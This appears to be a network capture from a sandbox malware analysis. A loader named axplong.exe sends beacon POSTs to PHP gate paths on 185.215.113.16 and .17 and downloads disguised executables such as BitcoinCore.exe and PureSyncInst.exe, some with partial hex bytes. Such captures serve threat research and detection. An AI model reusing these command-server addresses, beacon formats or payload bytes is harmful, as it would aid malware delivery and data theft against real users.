Aug 31, 2024 15:44:38.396682024 CEST	473	OUT	POST /2fb6c2cc8dce150a.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGIJEGHDAECAKECAFCAK Host: 185.215.113.17 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 35 34 63 37 33 61 66 36 34 66 63 65 35 34 34 61 30 62 33 30 30 31 30 35 65 38 63 31 61 31 36 34 39 35 35 37 30 34 38 61 38 37 38 31 32 38 39 31 63 39 62 31 30 35 39 31 33 66 66 64 34 34 64 31 30 31 39 36 63 62 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 4b 2d 2d 0d 0a Data Ascii: ------DGIJEGHDAECAKECAFCAKContent-Disposition: form-data; name="token"8954c73af64fce544a0b300105e8c1a1649557048a87812891c9b105913ffd44d10196cb------DGIJEGHDAECAKECAFCAKContent-Disposition: form-data; name="message"wkkjqaiaxkhb------DGIJEGHDAECAKECAFCAK--
Aug 31, 2024 15:44:40.051734924 CEST	202	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 13:44:38 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=79 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49725	185.215.113.16	80	6664	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 15:44:14.909946918 CEST	184	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 30 36 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000066001&unit=246122658369
Aug 31, 2024 15:44:15.662327051 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:44:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49727	52.212.52.84	80	6664	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 15:44:15.680608988 CEST	88	OUT	GET /3827530/caesium-image-compressor.exe?hash=AgADPx HTTP/1.1 Host: ddl.safone.dev
Aug 31, 2024 15:44:16.304042101 CEST	856	IN	HTTP/1.1 200 OK Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1725111856&sid=c4c9725f-1ab0-44d8-820f-430df2718e11&s=nvO01h8kMFjDo4AeHerRlBIcaU0rcK3gJxvn875VBOU%3D"}]} Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1725111856&sid=c4c9725f-1ab0-44d8-820f-430df2718e11&s=nvO01h8kMFjDo4AeHerRlBIcaU0rcK3gJxvn875VBOU%3D Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]} Connection: keep-alive Content-Type: application/x-msdownload Range: bytes=0-6827007 Content-Range: bytes 0-6827007/6827008 Content-Disposition: attachment; filename="caesium-image-compressor.exe" Accept-Ranges: bytes Content-Length: 6827008 Date: Sat, 31 Aug 2024 13:44:16 GMT Server: Python/3.8 aiohttp/3.9.3 Via: 1.1 vegur
Aug 31, 2024 15:44:17.504751921 CEST	1236	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL@g/,`@ki@
Aug 31, 2024 15:44:17.504766941 CEST	1236	IN	Data Raw: 0a 20 ff cc cc cc cc cc cc cc cc cc 8b 0d 1c fb a6 00 64 8b 09 8b 09 3b 61 08 76 20 83 ec 08 e8 d8 04 00 00 8b 44 24 0c 89 04 24 8b 44 24 10 89 44 24 04 e8 14 00 00 00 83 c4 08 c3 e8 bb fb 06 00 eb c9 cc cc cc cc cc cc cc cc cc 8b 0d 1c fb a6 00 Data Ascii: d;av D$$D$D$d;aD\$Hl$L1}11'9Op9;)}!\|;cpu.u1yL$,t$<A9
Aug 31, 2024 15:44:17.504780054 CEST	1236	IN	Data Raw: 07 00 89 d1 89 c2 e8 bd 0b 07 00 89 f0 89 e9 e8 f4 0b 07 00 89 c1 89 ea e8 ab 0b 07 00 90 e8 05 f7 06 00 e9 50 fb ff ff 8b 0d 1c fb a6 00 64 8b 09 8b 09 3b 61 08 0f 86 76 07 00 00 83 ec 30 8d 05 60 d5 72 00 89 04 24 e8 3b ab 00 00 8b 44 24 04 c7 Data Ascii: Pd;av0`r$;D$@YxH@\xHH@$xH H(@4[xH0H8@DxH@HH@T_xHPHX
Aug 31, 2024 15:44:17.504791975 CEST	636	IN	Data Raw: 0c 00 00 8b 0d 28 fe a6 00 85 c9 74 2d 8b 0c 02 e8 8f 06 07 00 89 0f 8b 4c 02 08 89 4f 04 8b 4c 02 10 89 4f 08 8b 4c 02 18 89 4f 0c 8b 4c 02 20 89 4f 10 8b 4c 02 28 89 4f 14 8d 0d 7d d1 78 00 89 0c 02 8d 0d e4 03 a7 00 89 4c 02 08 c7 44 02 14 08 Data Ascii: (t-LOLOLOL OL(O}xLDfDxLLD$fD,xL L($D$D$'D$$$D$D$$D$D$
Aug 31, 2024 15:44:17.506068945 CEST	1236	IN	Data Raw: a9 00 00 00 80 0f 95 c0 88 05 e6 03 a7 00 c7 04 24 00 00 00 80 c7 44 24 04 00 00 00 00 e8 16 03 00 00 81 7c 24 08 01 00 00 80 73 04 83 c4 30 c3 c7 04 24 01 00 00 80 c7 44 24 04 00 00 00 00 e8 f4 02 00 00 8b 44 24 14 a9 00 00 00 08 0f 95 c0 88 05 Data Ascii: $D$\|$s0$D$D$000qldD$;A=rZ\|$ 1$D$wL$T$\$l$$$$$10
Aug 31, 2024 15:44:17.506081104 CEST	1236	IN	Data Raw: b6 48 4c 38 4a 4c 75 2f 0f b6 48 4d 38 4a 4d 75 26 8b 4a 54 39 48 54 75 1e 8b 48 58 39 4a 58 75 16 0f b6 48 5c 38 4a 5c 75 0d 0f b6 48 5d 38 4a 5d 75 04 31 c9 eb 19 31 c0 88 44 24 20 83 c4 14 c3 8b 5c 24 10 8d 4b 02 8b 44 24 18 8b 54 24 1c 83 f9 Data Ascii: HL8JLu/HM8JMu&JT9HTuHX9JXuH\8J\uH]8J]u11D$ \$KD$T$}aL$,4L,$t$L$^D$tD$HT$l$4)L$t$L$)D$uy?Z)~9r\|r;o
Aug 31, 2024 15:44:17.506100893 CEST	1236	IN	Data Raw: 00 c3 e8 29 e6 06 00 eb c7 cc cc cc cc cc cc cc 8b 0d 1c fb a6 00 64 8b 09 8b 09 3b 61 08 76 0b 8b 44 24 04 8b 00 89 44 24 08 c3 e8 00 e6 06 00 eb de cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 0d 1c fb a6 00 64 8b 09 8b 09 3b 61 08 0f 86 cd 00 Data Ascii: )d;avD$D$d;aD$Hu1_Hw(wu,Du<(:u$00+wu8$u$u0 t/Hfu11hw,D$T$
Aug 31, 2024 15:44:17.506110907 CEST	672	IN	Data Raw: 2c 27 96 8d 5c 01 02 8d 34 08 85 d2 74 11 8d 3c 2a 8d 7c 37 03 0f b6 6c 24 70 83 cd 02 eb 07 0f b6 6c 24 70 89 df 89 5c 24 40 89 74 24 50 89 4c 24 48 0f b6 74 24 71 96 84 c0 96 74 03 83 cd 08 95 88 44 24 3b 95 89 7c 24 4c 8d 05 20 0e 73 00 89 04 Data Ascii: ,'\4t<*\|7l$pl$p\$@t$PL$Ht$qtD$;\|$L s$\|$\|$L$L{T$\$;Yt$H~9\|T$Xl$19t$l$\|$=L$LT$Xt$HF9)!t$d9\|l$`9t"$l$
Aug 31, 2024 15:44:17.506120920 CEST	1236	IN	Data Raw: 00 00 00 8b 44 24 60 89 44 24 0c c7 44 24 10 00 04 00 00 8d 05 ea c2 78 00 89 44 24 14 c7 44 24 18 03 00 00 00 e8 a2 e0 04 00 8b 44 24 1c 8b 4c 24 20 89 04 24 89 4c 24 04 e8 be 39 06 00 8b 44 24 08 8d 0d a0 0d 73 00 89 0c 24 89 44 24 04 e8 a8 88 Data Ascii: D$`D$D$xD$D$D$L$ $L$9D$s$D$b-d;avUYuRT$t=-9~D@vMEL$D$1q^\|$9;u#d
Aug 31, 2024 15:44:17.506138086 CEST	1236	IN	Data Raw: eb c6 8d 7c 24 04 39 3b 75 d5 89 23 eb d1 cc cc cc cc cc cc cc cc cc cc 8b 0d 1c fb a6 00 64 8b 09 8b 09 3b 61 08 76 24 83 ec 08 8b 59 10 85 db 75 21 8b 44 24 0c 84 00 89 04 24 e8 a8 f4 ff ff 8b 44 24 04 89 44 24 10 83 c4 08 c3 e8 97 d9 06 00 eb Data Ascii: \|$9;u#d;av$Yu!D$$D$D$\|$9;u#d;avYuD$D$Y\|$9;u#d;av6D$T$9u"Hf9JuHf9Ju@9BD$D$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49729	185.215.113.16	80	6664	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 15:44:23.434242964 CEST	184	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 31 32 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000129001&unit=246122658369
Aug 31, 2024 15:44:24.195218086 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:44:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0
Aug 31, 2024 15:44:24.196835041 CEST	59	OUT	GET /inc/BitcoinCore.exe HTTP/1.1 Host: 185.215.113.16
Aug 31, 2024 15:44:24.619743109 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:44:24 GMT Content-Type: application/octet-stream Content-Length: 10481152 Last-Modified: Sun, 25 Aug 2024 13:30:36 GMT Connection: keep-alive ETag: "66cb31fc-9fee00" Accept-Ranges: bytes Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 36 34 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 83 2e cb 66 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 08 00 00 c4 5d 00 00 26 42 00 00 00 00 00 60 d3 5d 00 00 10 00 00 00 00 40 00 00 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 05 00 02 00 05 00 02 00 00 00 00 00 00 30 [TRUNCATED] Data Ascii: MZP@!L!This program must be run under Win64$7PEd.f"]&B`]@0@ `gpfP0q/@l0gg(ffF.text]] `.data]]@.bss,e.idataPpfRze@.didataFfe@.edata`g\f@@.tlspg.rdatamg^f@@.relocg`f@B.pdata0@lk@@.rsrc/0q/o@@
Aug 31, 2024 15:44:24.619765043 CEST	164	IN	Data Raw: 00 00 00 00 00 00 00 30 a1 00 00 00 00 00 00 ee 9f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 10 40 00 00 00 00 00 03 07 42 6f 6f 6c 65 61 6e 01 00 00 00 00 01 00 Data Ascii: 0@@@Boolean@FalseTrueSystem@@AnsiChar`@Char
Aug 31, 2024 15:44:24.619774103 CEST	1236	IN	Data Raw: 00 ff ff 00 00 02 00 00 00 00 00 00 00 00 80 10 40 00 00 00 00 00 01 08 53 68 6f 72 74 49 6e 74 00 80 ff ff ff 7f 00 00 00 02 00 00 00 00 a0 10 40 00 00 00 00 00 01 08 53 6d 61 6c 6c 49 6e 74 02 00 80 ff ff ff 7f 00 00 02 00 00 00 00 c0 10 40 00 Data Ascii: @ShortInt@SmallInt@Integer@Byte@Word @Cardinal@@Pointer`@
Aug 31, 2024 15:44:24.619781971 CEST	1236	IN	Data Raw: 00 12 50 14 40 00 00 00 00 00 05 52 69 67 68 74 02 00 02 00 09 f0 61 41 00 00 00 00 00 05 45 6d 70 74 79 00 00 50 14 40 00 00 00 00 00 00 02 00 09 00 61 41 00 00 00 00 00 06 43 72 65 61 74 65 00 00 50 14 40 00 00 00 00 00 02 02 00 00 00 00 00 00 Data Ascii: P@RightaAEmptyP@aACreateP@Data@BigEndianaACreateP@@Data@AStartIndex@BigEndian@PInterfaceEntry8@
Aug 31, 2024 15:44:24.619791985 CEST	328	IN	Data Raw: 40 00 00 00 00 00 50 d0 40 00 00 00 00 00 20 d0 40 00 00 00 00 00 e0 c6 40 00 00 00 00 00 10 c7 40 00 00 00 00 00 20 c9 40 00 00 00 00 00 30 c7 40 00 00 00 00 00 40 c7 40 00 00 00 00 00 50 c7 40 00 00 00 00 00 00 00 25 00 22 1c 40 00 00 00 00 00 Data Ascii: @P@ @@@ @0@@@P@%"@DT@B@B@C@BB@Bw@C@C@C;@Cp@C@C@C?@C
Aug 31, 2024 15:44:24.619801998 CEST	1236	IN	Data Raw: 40 00 00 00 00 00 43 00 f1 ff ed 21 40 00 00 00 00 00 43 00 f1 ff 31 22 40 00 00 00 00 00 4a 00 f2 ff 74 22 40 00 00 00 00 00 4a 00 f3 ff ab 22 40 00 00 00 00 00 4a 00 f4 ff ee 22 40 00 00 00 00 00 4a 00 f5 ff 5d 23 40 00 00 00 00 00 4a 00 f6 ff Data Ascii: @C!@C1"@Jt"@J"@J"@J]#@J#@J#@J $@Jo$@K$@J$@M%@JF%@J{%@JTObject2@Create %@S
Aug 31, 2024 15:44:24.619812012 CEST	1236	IN	Data Raw: 00 02 00 4a 00 c0 d2 40 00 00 00 00 00 0c 46 69 65 6c 64 41 64 64 72 65 73 73 03 00 38 11 40 00 00 00 00 00 20 00 02 08 b0 25 40 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 12 70 12 40 00 00 00 00 00 00 00 04 4e 61 6d 65 02 00 02 00 4a 00 70 d3 40 Data Ascii: J@FieldAddress8@ %@Selfp@NameJp@FieldAddress8@ %@Selfp@NameZ @GetInterface@(%@SelfP@IID ObjN
Aug 31, 2024 15:44:24.619822979 CEST	328	IN	Data Raw: 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 00 35 00 30 c7 40 00 00 00 00 00 09 43 50 50 5f 41 42 49 5f 31 03 00 00 00 00 00 00 00 00 00 18 00 01 08 b0 25 40 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 00 35 00 40 c7 40 00 00 00 00 00 09 43 50 50 Data Ascii: Self50@CPP_ABI_1%@Self5@@CPP_ABI_2%@Self5P@CPP_ABI_3%@Self%@TObjectX@System&@
Aug 31, 2024 15:44:24.619832039 CEST	1236	IN	Data Raw: 40 00 00 00 00 00 00 d0 40 00 00 00 00 00 f0 cf 40 00 00 00 00 00 30 d0 40 00 00 00 00 00 40 d0 40 00 00 00 00 00 50 d0 40 00 00 00 00 00 20 d0 40 00 00 00 00 00 e0 c6 40 00 00 00 00 00 10 c7 40 00 00 00 00 00 20 c9 40 00 00 00 00 00 30 c7 40 00 Data Ascii: @@@0@@@P@ @@@ @0@@@P@TCustomAttribute&@TCustomAttribute&@%@System'@'@'@
Aug 31, 2024 15:44:24.619910002 CEST	1236	IN	Data Raw: 00 00 00 06 43 72 65 61 74 65 03 00 00 00 00 00 00 00 00 00 28 00 02 08 70 2b 40 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 70 13 40 00 00 00 00 00 00 00 12 53 74 6f 72 61 67 65 48 61 6e 64 6c 65 72 4e 61 6d 65 02 00 02 00 00 00 00 00 00 00 00 Data Ascii: Create(p+@Selfp@StorageHandlerNamex+@StoredAttribute*@&@System+@+@@Flagp@
Aug 31, 2024 15:44:24.619920015 CEST	328	IN	Data Raw: 00 00 00 00 00 00 00 00 01 00 01 b8 10 40 00 00 00 00 00 08 00 00 00 09 46 52 65 66 43 6f 75 6e 74 14 00 00 29 40 00 00 00 00 00 90 c8 40 00 00 00 00 00 00 00 00 00 03 00 63 30 40 00 00 00 00 00 4a 00 f6 ff a0 30 40 00 00 00 00 00 4a 00 f7 ff dd Data Ascii: @FRefCount)@@c0@J0@J0@KTInterfacedObject=YAAfterConstruction1@Self= YABeforeDestruction1@Self7@YA

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49730	185.215.113.16	80	6664	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 15:44:33.003041029 CEST	184	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 31 39 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000191001&unit=246122658369
Aug 31, 2024 15:44:33.770917892 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:44:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49732	52.212.52.84	80	6664	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 15:44:33.978948116 CEST	75	OUT	GET /3803980/whiteheroin.exe?hash=AgADjF HTTP/1.1 Host: ddl.safone.dev
Aug 31, 2024 15:44:34.922333002 CEST	726	IN	HTTP/1.1 404 Not Found Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1725111874&sid=c4c9725f-1ab0-44d8-820f-430df2718e11&s=zVy9OswCQ%2Fqvd%2Fk%2F2sKEcc80bBuzxToRu8YT5rn2Kx4%3D"}]} Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1725111874&sid=c4c9725f-1ab0-44d8-820f-430df2718e11&s=zVy9OswCQ%2Fqvd%2Fk%2F2sKEcc80bBuzxToRu8YT5rn2Kx4%3D Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]} Connection: keep-alive Content-Type: text/plain; charset=utf-8 Content-Length: 15 Date: Sat, 31 Aug 2024 13:44:34 GMT Server: Python/3.8 aiohttp/3.9.3 Via: 1.1 vegur Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 21 Data Ascii: File not found!

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49734	185.215.113.16	80	6664	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 15:44:34.933394909 CEST	184	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 31 Cache-Control: no-cache Data Raw: 65 30 3d 31 30 30 30 32 30 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1000209001&unit=246122658369
Aug 31, 2024 15:44:35.678472042 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:44:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49738	185.215.113.16	80	6664	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 15:44:37.590183973 CEST	184	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 31 Cache-Control: no-cache Data Raw: 65 30 3d 31 30 30 30 32 32 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1000223001&unit=246122658369
Aug 31, 2024 15:44:38.358654976 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:44:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49739	52.212.52.84	80	6664	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 15:44:38.366132021 CEST	76	OUT	GET /3830515/PureSyncInst.exe?hash=AgADvR HTTP/1.1 Host: ddl.safone.dev
Aug 31, 2024 15:44:38.979993105 CEST	856	IN	HTTP/1.1 200 OK Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1725111878&sid=c4c9725f-1ab0-44d8-820f-430df2718e11&s=HwATLp66HgP%2FFO8Zz0tCOK8C%2FCDQ0WnfEd8M7Ygpv%2BI%3D"}]} Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1725111878&sid=c4c9725f-1ab0-44d8-820f-430df2718e11&s=HwATLp66HgP%2FFO8Zz0tCOK8C%2FCDQ0WnfEd8M7Ygpv%2BI%3D Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]} Connection: keep-alive Content-Type: application/x-msdownload Range: bytes=0-9697279 Content-Range: bytes 0-9697279/9697280 Content-Disposition: attachment; filename="PureSyncInst.exe" Accept-Ranges: bytes Content-Length: 9697280 Date: Sat, 31 Aug 2024 13:44:38 GMT Server: Python/3.8 aiohttp/3.9.3 Via: 1.1 vegur
Aug 31, 2024 15:44:40.175146103 CEST	1236	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELb6Ecp@0@
Aug 31, 2024 15:44:40.175162077 CEST	1236	IN	Data Raw: f3 85 ed 0f 84 08 02 00 00 31 c0 e9 af 02 00 00 b8 ff ff ff ff 85 c0 7d 08 89 e8 31 c9 31 f6 eb 27 39 e8 0f 87 4f 04 00 00 8d 70 01 39 f5 0f 82 3b 04 00 00 29 c5 8d 7d ff 89 f9 87 df f7 db 87 df c1 ff 1f 21 fe 01 de 83 f8 04 7c b0 81 3b 63 70 75 Data Ascii: 1}11'9Op9;)}!\|;cpu.u1yL$,t$<A9jJ4+9\|$(t$4)x\|$!<\|$0uf?onuauWf?ofuPL9fuG
Aug 31, 2024 15:44:40.175174952 CEST	1236	IN	Data Raw: 8d 0d 10 d5 93 00 89 48 10 8d 0d 40 e7 d1 00 89 48 18 c7 40 24 04 00 00 00 8d 0d 10 d8 93 00 89 48 20 8d 0d 49 e7 d1 00 89 48 28 c7 40 34 09 00 00 00 8d 0d 4a f7 93 00 89 48 30 8d 0d 4c e7 d1 00 89 48 38 c7 40 44 06 00 00 00 8d 0d 20 e1 93 00 89 Data Ascii: H@H@$H IH(@4JH0LH8@D H@NHH@THPOHXtAO$D$(9sZ$T$L$D$ *D
Aug 31, 2024 15:44:40.175199986 CEST	1236	IN	Data Raw: c7 44 02 24 08 00 00 00 66 c7 44 02 2c 00 00 8d 0d 72 ef 93 00 89 4c 02 20 8d 0d 46 e7 d1 00 89 4c 02 28 c7 04 24 00 00 00 00 c7 44 24 04 00 00 00 00 e8 0d 05 00 00 8b 44 24 08 85 c0 0f 84 27 02 00 00 89 44 24 24 c7 04 24 00 00 00 80 c7 44 24 04 Data Ascii: D$fD,rL FL($D$D$'D$$$D$D$0$D$D$PLQRSM@K
Aug 31, 2024 15:44:40.180125952 CEST	896	IN	Data Raw: 24 68 8b 6c 24 58 eb ab 4a 89 d3 f7 db c1 fb 1f 83 e3 01 01 d9 48 85 c0 74 05 80 39 20 74 e9 31 d2 eb 01 42 39 c2 7d 0a 0f b6 1c 11 84 db 75 f3 eb 02 89 c2 c7 04 24 00 00 00 00 89 4c 24 04 89 54 24 08 e8 e8 eb 06 00 8b 44 24 0c 8b 4c 24 10 89 84 Data Ascii: $hl$XJHt9 t1B9}u$L$T$D$L$$$&$AD$L$D$\$L$T$D$T$D$d;avRD$HT$9Ju5X9Zu-X8Zu
Aug 31, 2024 15:44:40.180286884 CEST	1236	IN	Data Raw: 96 77 04 8b 36 eb 06 8b 74 2e fc d3 ee d3 e6 97 80 f8 fc 97 77 04 8b 3f eb 06 8b 7c 2f fc d3 ef d3 e7 0f ce 0f cf 31 f7 74 12 0f bd cf d3 ee 83 e6 01 8d 1c 75 ff ff ff ff 89 18 c3 31 db 31 c9 85 d2 0f 9c c3 0f 94 c1 8d 5c 59 ff 89 18 c3 cc 8b 74 Data Ascii: w6t.w?\|/1tu11\Yt$\$\|$T$D$t$\$\|$T$D$@r[oooVo_of oo ov0o0ftftftftffff@@@
Aug 31, 2024 15:44:40.180299997 CEST	1236	IN	Data Raw: f6 c0 80 96 75 ca 83 f8 01 75 09 80 7d 02 5f 0f 94 c0 eb 02 31 c0 88 44 24 08 c3 e8 3c 5c 03 00 90 e8 16 1c 07 00 eb 84 cc cc cc cc 8b 0d 94 dd d1 00 64 8b 09 8b 09 3b 61 08 0f 86 96 00 00 00 83 ec 04 8b 44 24 08 85 c0 74 06 31 c9 31 d2 eb 1c c7 Data Ascii: uu}_1D$<\d;aD$t11D$D$$KIYt\|R$6 !u$D\|"9rL$T$t+[aLd
Aug 31, 2024 15:44:40.180310011 CEST	1236	IN	Data Raw: e4 2b 07 00 89 c8 b9 0a 00 00 00 e8 d8 2b 07 00 89 c8 b9 0a 00 00 00 e8 cc 2b 07 00 c7 04 24 00 00 00 00 8d 05 00 cd 94 00 89 44 24 04 c7 44 24 08 1b 00 00 00 8b 44 24 68 89 44 24 0c c7 44 24 10 00 04 00 00 8d 05 59 d4 93 00 89 44 24 14 c7 44 24 Data Ascii: +++$D$D$D$hD$D$YD$D$\D$L$ $L$fD$u$D$b$D$D$D$`D$D$YD$D$D$L$ $L$fD$u$D$r
